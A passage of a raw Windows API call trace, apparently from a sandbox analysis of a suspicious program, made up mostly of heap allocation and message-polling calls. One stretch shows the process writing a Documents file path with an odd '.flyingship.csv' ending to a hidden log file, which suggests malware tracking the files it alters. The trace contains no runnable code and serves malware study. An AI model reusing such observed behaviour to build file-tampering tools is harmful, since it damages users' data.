0x11 [0180.405] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.405] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.405] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.405] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.405] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0180.406] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.407] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.407] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0180.407] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.407] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0180.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.407] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0180.408] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1ccb, lpOverlapped=0x0) returned 1 [0180.408] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0180.408] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1ccb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.408] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0180.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.flyingship.csv\r\n", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0180.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x45) returned 0x9aa4f8 [0180.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.flyingship.csv\r\n", cchWideChar=69, lpMultiByteStr=0x9aa4f8, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.flyingship.csv\r\n", lpUsedDefaultChar=0x0) returned 69 [0180.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0180.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0180.409] WriteFile (in: hFile=0x138, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x44, lpOverlapped=0x0) returned 1 [0180.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0180.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.409] CloseHandle (hObject=0x138) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0180.411] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0180.412] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0180.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0180.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0180.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.416] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0180.416] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.416] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0180.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0180.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.416] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0180.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0180.417] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0180.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0180.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0180.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0180.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0180.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.421] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.422] HeapFree (in: hHeap=0x8a0000, 